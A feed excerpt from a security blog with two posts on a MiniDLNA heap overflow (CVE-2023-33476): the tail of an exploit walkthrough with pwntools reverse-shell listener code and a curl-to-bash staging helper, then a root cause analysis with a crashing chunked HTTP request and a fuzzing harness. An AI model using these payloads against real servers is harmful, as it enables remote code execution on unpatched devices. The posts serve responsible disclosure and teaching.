    <span class="c1"># wait for the incoming reverse shell connection; bail if we don't get it in a second.
</span>    <span class="n">l</span> <span class="o">=</span> <span class="n">pwn</span><span class="p">.</span><span class="nf">listen</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">lport</span><span class="p">)</span>
    <span class="n">l</span><span class="p">.</span><span class="nf">settimeout</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="nf">wait_for_connection</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">x</span><span class="p">.</span><span class="nf">connected</span><span class="p">():</span>
        <span class="nf">xpr</span><span class="p">(</span><span class="sh">"</span><span class="s">~~~ &lt;CHONKCHONKCHONK&gt; ~~~</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">l</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="nf">xerr</span><span class="p">(</span><span class="sh">"</span><span class="s">=ERROR=: Timed out waiting for reverse shell connection, exploit likely failed</span><span class="sh">"</span><span class="p">)</span>
        <span class="nf">xpr</span><span class="p">(</span><span class="sh">"</span><span class="s">tip: try adjusting the --got_addr or --system_addr arguments if SEGV; make sure netcat is available on target</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

</code></pre></div></div>
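
<p>The snippet above references <code class="language-plaintext highlighter-rouge">resp</code> and <code class="language-plaintext highlighter-rouge">reverse_shell_cmd</code> without showing them. A minimal sketch of how a staged response could be assembled is below; the <code class="language-plaintext highlighter-rouge">build_stage_response()</code> helper, the headers, and the placeholder script body are assumptions, not the values used by the exploit.</p>

```python
def build_stage_response(script):
    """Wrap a shell script in a minimal HTTP response for curl to fetch."""
    body = script.encode()
    headers = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/plain\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return headers.encode() + body


# Placeholder body; the exploit serves its own script here.
response = build_stage_response("echo staged\n")
print(response.decode())
```

<p>Sending an explicit <code class="language-plaintext highlighter-rouge">Content-Length</code> and closing the connection gives <code class="language-plaintext highlighter-rouge">curl</code> a clear end of body, so the pipe to <code class="language-plaintext highlighter-rouge">bash</code> completes without waiting on the socket.</p>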

<h3 id="popping-a-shell">popping a shell</h3>
<p>And here’s the exploit running against the target binary:</p>

<p><img src="/assets/images/chonked-images/exploit.png" alt="exploit.png" /></p>

<h2 id="wrapping-up">Wrapping Up</h2>

<p>And there we are! Hopefully this has all been useful for understanding everything that goes into
writing a full exploit for this kind of vulnerability. Ultimately, it isn’t <em>complete</em> in the sense
that it assumes an info leak is already present to leak Libc and GOT addresses. This same bug could
potentially be used to get that info leak but I didn’t invest much time in figuring that out. Maybe
that can be left as an exercise for the curious reader.</p>

<h3 id="exploitability-in-the-real-worldtm">exploitability in the Real World(TM)</h3>

<p>Exploitability of this bug will be dependent upon the Libc version the application is linked against
and compiler exploit mitigations used, to some extent. Given the variability of these factors across
the range of devices this application is deployed to (IoT, routers, Linux servers), there is a
high likelihood of finding Libc versions vulnerable to multiple heap exploit techniques and missing
exploit mitigations such as ASLR, RELRO, etc. Ultimately, because the bug provides for a strong write
primitive, there are various options for exploitation. While most modern Linux distros running on
desktop/server hardware now enable common compiler exploit mitigations for default applications and
applications installed through the package manager, MiniDLNA is frequently deployed on IoT devices
where those mitigations are likely to not be enabled; versions built from source by end-users are
also unlikely to enable these mitigations. The exploit strategy and mechanisms used in the included
exploits will not work universally across all platforms and configurations, but there are likely
dozens of targets that would meet the necessary criteria.</p>

<h3 id="arm32-exploit">arm32 exploit?</h3>

<p>This post is already pretty long and it’s taken me longer than expected to release it, so I’ve
decided to split the last section going over the exploit I wrote for the arm32 <code class="language-plaintext highlighter-rouge">minidlnad</code> binary
from the Netgear RAX30 into a separate post, though the exploit code for both will be made
available now. That exploit works a little differently, targeting the stack rather than the GOT for
overwrite since that binary has full RELRO enabled (which makes the GOT read-only).</p>

<h2 id="resources">Resources</h2>

<ul>
  <li><a href="https://github.com/mellow-hype/cve-2023-33476">Exploit Code Repo</a></li>
  <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Transfer-Encoding">Mozilla - HTTP Transfer Encoding</a></li>
  <li><a href="https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/">Azeria Labs - Understanding the Glibc Heap Implementation</a></li>
  <li><a href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/">Understanding Glibc Malloc</a></li>
  <li><a href="https://github.com/shellphish/how2heap/blob/master/glibc_2.35/tcache_poisoning.c">how2heap - Tcache Poisoning</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0day" /><category term="0day" /><category term="minidlna" /><category term="exploit" /><category term="cve-2023-33476" /><summary type="html"><![CDATA[second part in a two-part series going over heap overflow in MiniDLNA (CVE-2023-33476). this post provides a walkthrough of steps taken to write an exploit for this vulnerability in order to achieve remote code execution and pop a shell.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/chonked-images/chonky.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/chonked-images/chonky.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">chonked pt.1: MiniDLNA 1.3.2 HTTP Chunk Parsing Heap Overflow (CVE-2023-33476) Root Cause Analysis</title><link href="https://blog.coffinsec.com/0day/2023/05/31/minidlna-heap-overflow-rca.html" rel="alternate" type="text/html" title="chonked pt.1: MiniDLNA 1.3.2 HTTP Chunk Parsing Heap Overflow (CVE-2023-33476) Root Cause Analysis" /><published>2023-05-31T00:00:00+00:00</published><updated>2023-05-31T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0day/2023/05/31/minidlna-heap-overflow-rca</id><content type="html" xml:base="https://blog.coffinsec.com/0day/2023/05/31/minidlna-heap-overflow-rca.html"><![CDATA[<p>This post provides the details and a root cause analysis of a heap buffer overflow vulnerability
I discovered in the HTTP chunk parsing code of MiniDLNA, affecting versions up to 1.3.2. This vulnerability can
be exploited to achieve remote code execution in the context of the user that the minidlna server is
running as. The issue was reported to the package maintainer following best practices for
responsible disclosure and a fixed version is now available. A follow-up post will be published soon
with a detailed write-up of the exploit development process along with two fully weaponized exploits
for both x86_64 and ARM32 targets, so stay tuned :)</p>

<p><em>Update: The second part of this post has been published and can be found
<a href="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html">here</a></em></p>

<h2 id="introduction">Introduction</h2>
<p><strong><em>Update 2023-06-02: The vulnerability has been assigned CVE-2023-33476.</em></strong></p>

<p>This post will go over the details and root cause of a heap buffer overflow vulnerability
I discovered in the HTTP chunk parsing code of MiniDLNA, affecting versions up to 1.3.2. This vulnerability can
be exploited to achieve remote code execution in the context of the user that the minidlna server is
running as.</p>

<p>The second part of this post contains a detailed write-up of the exploit development process
along with two fully weaponized exploits for both x86_64 and ARM32 targets and can be found <a href="https://blog.coffinsec.com/0day/2023/06/19/minidlna-cve-2023-33476-exploits.html">here</a>.</p>

<h3 id="vulnerability-summary">Vulnerability Summary</h3>
<p>MiniDLNA is simple media server software that aims to be fully compliant with
DLNA/UPnP-AV clients. It is commonly deployed on Linux servers and across a wide range of embedded
devices like routers and NAS devices.</p>

<p>The latest version of the MiniDLNA/ReadyMedia media server contains a vulnerability in the HTTP
request processing code responsible for handling requests that use chunked encoding which can result
in an out-of-bounds read/write leading to remote code execution. The issue occurs in the validation
logic for chunk sizes in <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> and results in the return value of a
comparison expression being incorrectly saved to a variable used to track the parsed chunk
size rather than the return value of <code class="language-plaintext highlighter-rouge">strtol()</code> that’s used to parse the size. This allows for
values larger than the total request size to pass validation; the application later parses and
passes these chunk size values as the <code class="language-plaintext highlighter-rouge">size</code> argument in call(s) to <code class="language-plaintext highlighter-rouge">memmove()</code>, resulting in an OOB
read/write on the heap.</p>
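
<p>The effect of storing the comparison result instead of the parsed value can be shown with a simplified model. This is not the MiniDLNA source: the function names and the bounds check are hypothetical stand-ins, with Python’s <code class="language-plaintext highlighter-rouge">int(line, 16)</code> playing the role of <code class="language-plaintext highlighter-rouge">strtol()</code>.</p>

```python
def parse_chunk_size_buggy(line):
    parsed = int(line, 16)
    # The result of the comparison is stored, so any positive size becomes 1.
    return int(parsed > 0)


def parse_chunk_size_fixed(line):
    # Store the parsed value itself.
    return int(line, 16)


def passes_validation(chunk_len, request_len):
    # Hypothetical bounds check: a chunk may not be larger than the request.
    return request_len >= chunk_len


REQUEST_LEN = 80   # made-up total request size in bytes

buggy = parse_chunk_size_buggy("ffffff")
fixed = parse_chunk_size_fixed("ffffff")
print(buggy, passes_validation(buggy, REQUEST_LEN))
print(fixed, passes_validation(fixed, REQUEST_LEN))
```

<p>With the buggy variant the tracked size is always 0 or 1, so the check passes for any declared chunk size, while the later copy still uses the real value parsed from the request.</p>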

<h3 id="affected-versions">Affected Versions</h3>

<ul>
  <li>All versions between 1.1.5 and 1.3.2 (inclusive)</li>
  <li>Default versions provided by <code class="language-plaintext highlighter-rouge">apt</code> on Debian 11 and Ubuntu 22.04</li>
  <li>Version deployed on the Netgear Nighthawk RAX30 w/ latest patches</li>
</ul>

<h3 id="minimal-testcase-to-trigger-the-bug">Minimal Testcase to Trigger the Bug</h3>

<p>This testcase will trigger the bug by passing a huge value (<code class="language-plaintext highlighter-rouge">0xffffff</code>) that is much larger than the
total request length sent, resulting in an OOB read past the end of the request buffer allocation
and into unmapped memory. The application should crash with a segmentation fault.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET /status HTTP/1.0\r\nTransfer-Encoding:chunked\r\n\r\nffffff\r\n0\r\n\r\n
</code></pre></div></div>
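
<p>For experimenting with different chunk sizes, the raw bytes of the testcase can be generated with a small helper like the one below. The <code class="language-plaintext highlighter-rouge">build_chunked_request()</code> function is an assumption added for convenience; it only builds the request and does not send anything.</p>

```python
def build_chunked_request(chunk_size_hex, path="/status"):
    """Return the raw bytes of a chunked request declaring the given chunk size."""
    return (
        f"GET {path} HTTP/1.0\r\n"
        "Transfer-Encoding:chunked\r\n"
        "\r\n"                      # end of headers
        f"{chunk_size_hex}\r\n"     # declared chunk size, no chunk data follows
        "0\r\n"                     # terminator chunk
        "\r\n"
    ).encode()


request = build_chunked_request("ffffff")
declared = int("ffffff", 16)
print(len(request), declared)
```

<p>Comparing the two printed numbers shows the mismatch the bug relies on: the declared chunk size is far larger than the request that carries it.</p>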

<h2 id="discovery">Discovery</h2>

<p>I originally discovered this vulnerability while fuzzing an older version of the software while
hunting for bugs on the Netgear RAX45. I wasn’t familiar enough with the code base to know exactly
the right place to fuzz so I just chose to go for the most reachable part of the code: HTTP request
handling. Fuzzing was done with both libFuzzer and AFL++ using custom harnesses. I made some minor
changes to the code to improve fuzzability, including removal of the network read/write
functionality, but otherwise no other changes were needed.</p>

<p>The core portion of the harness used to find this particular bug is shown below. The full harness
code and other helper code will be released soon.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
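#include</span> <span class="cpf">&lt;stddef.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">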
#include</span> <span class="cpf">"minixml.h"</span><span class="cp">
#include</span> <span class="cpf">"upnphttp.h"</span><span class="cp">
#include</span> <span class="cpf">"upnpsoap.h"</span><span class="cp">
#include</span> <span class="cpf">"containers.h"</span><span class="cp">
#include</span> <span class="cpf">"upnpreplyparse.h"</span><span class="cp">
#include</span> <span class="cpf">"scanner.h"</span><span class="cp">
#include</span> <span class="cpf">"log.h"</span><span class="cp">
</span>
<span class="kt">void</span> <span class="nf">ProcessHttpQuery_upnphttp</span><span class="p">(</span><span class="k">struct</span> <span class="n">upnphttp</span> <span class="o">*</span><span class="p">);</span>

<span class="kt">int</span> <span class="nf">LLVMFuzzerTestOneInput</span><span class="p">(</span><span class="k">const</span> <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">upnphttp</span> <span class="o">*</span><span class="n">h</span> <span class="o">=</span> <span class="n">New_upnphttp</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">endheaders</span><span class="p">;</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="n">size</span><span class="o">+</span><span class="mi">1</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">)</span>
    <span class="p">{</span>
      <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">memcpy</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span>
    <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">[</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
    <span class="cm">/* search for the string "\r\n\r\n" */</span>
    <span class="n">endheaders</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n\r\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">if</span><span class="p">(</span><span class="n">endheaders</span><span class="p">)</span>
    <span class="p">{</span>
      <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span> <span class="o">=</span> <span class="n">endheaders</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span>
      <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentlen</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>
      <span class="n">ProcessHttpQuery_upnphttp</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
      <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">);</span>
      <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">res_buf</span><span class="p">);</span>
      <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
      <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">res_buf</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>

</code></pre></div></div>

<p>After a few days of fuzzing, tweaking the harnesses, and fuzzing some more, I had come across a
handful of crashes that seemed somewhat promising. Among them was this one.</p>

<p>An interesting side note here: thanks to Netgear’s terrible practices with their GPL code releases,
it turned out that the actual device I was testing against (RAX45) was not only running a newer version
than the one they included in their GPL package, it was also a custom fork that apparently had fixed
these bugs already. I confirmed this by reversing the binary taken straight from the device. Maybe
it’s just me, but it’s nuts that they’re fixing vulnerabilities in their internal forks of open source
code and not providing those fixes in their GPL packages, let alone pushing them upstream. After
discovering this I decided to pivot to just focusing on the latest code from the MiniDLNA Git repo and
confirmed that version was vulnerable as well.</p>

<h2 id="root-cause-analysis">Root Cause Analysis</h2>

<p>The vulnerable code is reached for any valid request that includes the
<code class="language-plaintext highlighter-rouge">Transfer-Encoding:chunked</code> HTTP header and that meets the following conditions:</p>

<ul>
  <li>Correctly terminates the HTTP headers with a <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> sequence</li>
  <li>Includes a terminator chunk at the end of the request body with a chunk size of 0</li>
  <li>Correctly follows chunk size values with the terminator sequence <code class="language-plaintext highlighter-rouge">\r\n</code></li>
</ul>

<p>The function call chain is shown below, beginning in <code class="language-plaintext highlighter-rouge">Process_upnphttp()</code> (<code class="language-plaintext highlighter-rouge">upnphttp.c:1096</code>):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Process_upnphttp() →
    ProcessHttpQuery_upnphttp(h) →
        ParseHttpHeaders(h) ← (returns)
    ProcessHttpQuery_upnphttp(h) -- VULNERABLE CODE
</code></pre></div></div>

<h3 id="initial-request-handling-process_upnphttp">Initial Request Handling: Process_upnphttp()</h3>
<p>The code responsible for the initial reception and processing of requests is in <code class="language-plaintext highlighter-rouge">Process_upnphttp()</code>
and is described below.</p>

<p><strong><code class="language-plaintext highlighter-rouge">Process_upnphttp(), upnphttp.c:1096</code></strong></p>

<p>Data is read from the socket using <code class="language-plaintext highlighter-rouge">recv()</code>, up to 2048 bytes at a time, into a local, fixed-size
2048-byte char buffer. If data is received, the code calculates <code class="language-plaintext highlighter-rouge">new_req_buflen</code> as <code class="language-plaintext highlighter-rouge">req_buflen + n + 1</code>,
where <code class="language-plaintext highlighter-rouge">n</code> is the number of bytes received and the extra byte leaves room for the null terminator,
and checks whether the new buffer length would reach the max value of 1MB. If so, an error is logged
and processing stops; otherwise the code continues.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">struct</span> <span class="n">upnphttp</span> <span class="o">*</span><span class="n">h</span> <span class="o">=</span> <span class="n">ev</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">2048</span><span class="p">];</span>
    <span class="p">[...]</span>
    <span class="p">{</span>
        <span class="kt">int</span> <span class="n">new_req_buflen</span><span class="p">;</span>
        <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">endheaders</span><span class="p">;</span>

        <span class="c1">// new buf len is the sum of the last calculated req_buflen and the</span>
        <span class="c1">// number of bytes the call to `recv` returned, plus 1 for the null terminator</span>
        <span class="n">new_req_buflen</span> <span class="o">=</span> <span class="n">n</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>

        <span class="c1">// check to see if the new buf len exceeds a max value (1MB)</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">new_req_buflen</span> <span class="o">&gt;=</span> <span class="mi">1024</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">DPRINTF</span><span class="p">(</span><span class="n">E_ERROR</span><span class="p">,</span> <span class="n">L_HTTP</span><span class="p">,</span> <span class="s">"Receive headers too large (received %d bytes)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">new_req_buflen</span><span class="p">);</span>
            <span class="n">h</span><span class="o">-&gt;</span><span class="n">state</span> <span class="o">=</span> <span class="mi">100</span><span class="p">;</span>
            <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Further down in this function, <code class="language-plaintext highlighter-rouge">realloc()</code> is called with <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> as the buffer to resize and
the calculated <code class="language-plaintext highlighter-rouge">new_req_buflen</code> as the new size. On the first round of processing (i.e. the first
2048 bytes received) <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> will be NULL and <code class="language-plaintext highlighter-rouge">realloc()</code> behaves like a normal call to
<code class="language-plaintext highlighter-rouge">malloc()</code>. The data is copied from the local buffer into the buffer pointed to by <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> and the
<code class="language-plaintext highlighter-rouge">h-&gt;req_buflen</code> field of the upnphttp struct is increased by the number of bytes received.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>                <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">realloc</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="n">new_req_buflen</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">)</span>
                <span class="p">{</span>
                    <span class="n">DPRINTF</span><span class="p">(</span><span class="n">E_ERROR</span><span class="p">,</span> <span class="n">L_HTTP</span><span class="p">,</span> <span class="s">"Receive headers: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
                    <span class="n">h</span><span class="o">-&gt;</span><span class="n">state</span> <span class="o">=</span> <span class="mi">100</span><span class="p">;</span>
                    <span class="k">break</span><span class="p">;</span>
                <span class="p">}</span>

                <span class="c1">// copy n bytes from the local `buf[2048]` to the alloc'ed memory</span>
                <span class="c1">// req_buflen will be 0 on the first round of processing since it's not updated</span>
                <span class="c1">// until the next line.</span>
                <span class="n">memcpy</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
                <span class="c1">// update req_buflen</span>
                <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">+=</span> <span class="n">n</span><span class="p">;</span>

</code></pre></div></div>
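
<p>To make the accumulation pattern easier to follow outside of the full function, here’s a minimal
standalone sketch of the same append-with-<code class="language-plaintext highlighter-rouge">realloc()</code> logic. The <code class="language-plaintext highlighter-rouge">struct req</code> type, the
<code class="language-plaintext highlighter-rouge">MAX_REQ_LEN</code> macro, and the <code class="language-plaintext highlighter-rouge">req_append()</code> name are made up for illustration and aren’t part of
MiniDLNA. The sketch also keeps the old pointer if <code class="language-plaintext highlighter-rouge">realloc()</code> fails, which the excerpt above
doesn’t do.</p>

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define MAX_REQ_LEN (1024 * 1024)   /* same 1MB cap as the check shown earlier */

/* Hypothetical stand-in for the req_buf/req_buflen fields of struct upnphttp. */
struct req {
    char *buf;
    int   len;
};

/* Append n received bytes to r->buf and keep it null terminated.
 * Returns 0 on success, -1 if the cap is hit or the allocation fails. */
int req_append(struct req *r, const char *data, int n)
{
    int new_len;
    char *p;

    assert(r != NULL && data != NULL);

    if (n < 0 || n > MAX_REQ_LEN)
        return -1;

    new_len = r->len + n + 1;            /* +1 leaves room for the '\0' */
    if (new_len >= MAX_REQ_LEN)
        return -1;

    /* realloc(NULL, size) behaves like malloc(size) on the first call */
    p = realloc(r->buf, (size_t)new_len);
    if (!p)
        return -1;                       /* r->buf is still valid here */

    r->buf = p;
    memcpy(r->buf + r->len, data, (size_t)n);
    r->len += n;
    r->buf[r->len] = '\0';
    return 0;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">req_append()</code> twice on a zero-initialized <code class="language-plaintext highlighter-rouge">struct req</code> leaves a single null-terminated
buffer holding both pieces, which is the state the header search in the next step relies on.</p>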

<p>Next, the buffer is null terminated and then passed to <code class="language-plaintext highlighter-rouge">strstr()</code> to search for a <code class="language-plaintext highlighter-rouge">\r\n\r\n</code>
sequence to determine whether the full HTTP headers section of the request has been received. Upon
finding this sequence, the start of the request body and its size are also calculated and the
respective values in the <code class="language-plaintext highlighter-rouge">upnphttp</code> struct (<code class="language-plaintext highlighter-rouge">req_contentoff</code> and <code class="language-plaintext highlighter-rouge">req_contentlen</code>) are updated. The
code then calls <code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code> to move on to parsing.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>            <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">[</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>

            <span class="c1">// search for the string "\r\n\r\n" and calculate content offset and content length if</span>
            <span class="c1">// found</span>
            <span class="n">endheaders</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span><span class="p">,</span> <span class="s">"</span><span class="se">\r\n\r\n</span><span class="s">"</span><span class="p">);</span>

            <span class="k">if</span><span class="p">(</span><span class="n">endheaders</span><span class="p">)</span>
            <span class="p">{</span>
                <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span> <span class="o">=</span> <span class="n">endheaders</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buf</span> <span class="o">+</span> <span class="mi">4</span><span class="p">;</span>
                <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentlen</span> <span class="o">=</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_buflen</span> <span class="o">-</span> <span class="n">h</span><span class="o">-&gt;</span><span class="n">req_contentoff</span><span class="p">;</span>
                <span class="n">ProcessHttpQuery_upnphttp</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
</code></pre></div></div>

<p>NOTE: The headers have only been read into <code class="language-plaintext highlighter-rouge">h-&gt;req_buf</code> at this point without parsing; they will be
parsed into fields of the <code class="language-plaintext highlighter-rouge">upnphttp</code> struct within the call to <code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code> at the
end of this code block.</p>
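
<p>The offset math is simple but easy to get off by a few bytes, so here’s a small standalone sketch
of it. <code class="language-plaintext highlighter-rouge">find_body()</code> is a hypothetical helper written for this post, not a MiniDLNA function, and
it assumes the request buffer is null terminated as in the code above.</p>

```c
#include <assert.h>
#include <string.h>

/* Locate the end of the HTTP headers in a null-terminated request buffer.
 * On success, stores the body offset and body length and returns 0;
 * returns -1 if "\r\n\r\n" has not been received yet. */
int find_body(const char *req, int req_len, int *content_off, int *content_len)
{
    const char *endheaders;

    assert(req != NULL && content_off != NULL && content_len != NULL);

    endheaders = strstr(req, "\r\n\r\n");
    if (!endheaders)
        return -1;

    *content_off = (int)(endheaders - req) + 4;   /* skip the "\r\n\r\n" itself */
    *content_len = req_len - *content_off;
    return 0;
}
```

<p>For a request whose headers are followed by the three bytes <code class="language-plaintext highlighter-rouge">abc</code>, the offset points at the
<code class="language-plaintext highlighter-rouge">a</code> and the content length is 3; if the blank line hasn’t arrived yet, the helper reports that
more data is needed.</p>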

<p><strong><code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code></strong>:</p>

<p>The first call to this function only happens once the <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> sequence is found, indicating the
end of the HTTP header section was received. After parsing the HTTP verb and path, it calls
<code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> to perform the actual parsing of the header data before doing anything else;
<strong>the source of the vulnerability is found here.</strong></p>

<p>When <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> returns and indicates the full request was received by setting
<code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> to 0, processing of the chunks in the HTTP body resumes in
<code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code>. This is where the corruption caused by the bug is triggered: the
chunk size parsed into <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> is passed to <code class="language-plaintext highlighter-rouge">memmove()</code> without validating that it does
not exceed the allocated buffer.</p>

<h3 id="bug-incorrect-chunk-size-validation-in-parsehttpheaders">BUG: Incorrect Chunk Size Validation in ParseHttpHeaders()</h3>

<p>After reading data from the socket and finding the end of the HTTP header section as
indicated by the presence of the <code class="language-plaintext highlighter-rouge">\r\n\r\n</code> sequence, <code class="language-plaintext highlighter-rouge">Process_upnphttp()</code> passes the request
off to <code class="language-plaintext highlighter-rouge">ProcessHttpQuery_upnphttp()</code>, which in turn calls <code class="language-plaintext highlighter-rouge">ParseHttpHeaders()</code> to perform the actual
parsing of the header data into a <code class="language-plaintext highlighter-rouge">upnphttp</code> struct. If the HTTP headers contain the
<code class="language-plaintext highlighter-rouge">Transfer-Encoding:chunked</code> header, a flag is set on the structure which will result in the
application reaching the vulnerable code on line 428.</p>

<p>After some rudimentary sanity checks of the <code class="language-plaintext highlighter-rouge">h-&gt;req_chunklen</code> and <code class="language-plaintext highlighter-rouge">h-&gt;req_contentoff</code> fields of the
struct, the code iterates through the rest of the request body, attempting to read the numeric size
values for each of the chunks at the expected offsets based on sizes read. It combines the step of
reading the size value and attempting to perform the size validation inside the conditions of the
following while loop:</p>

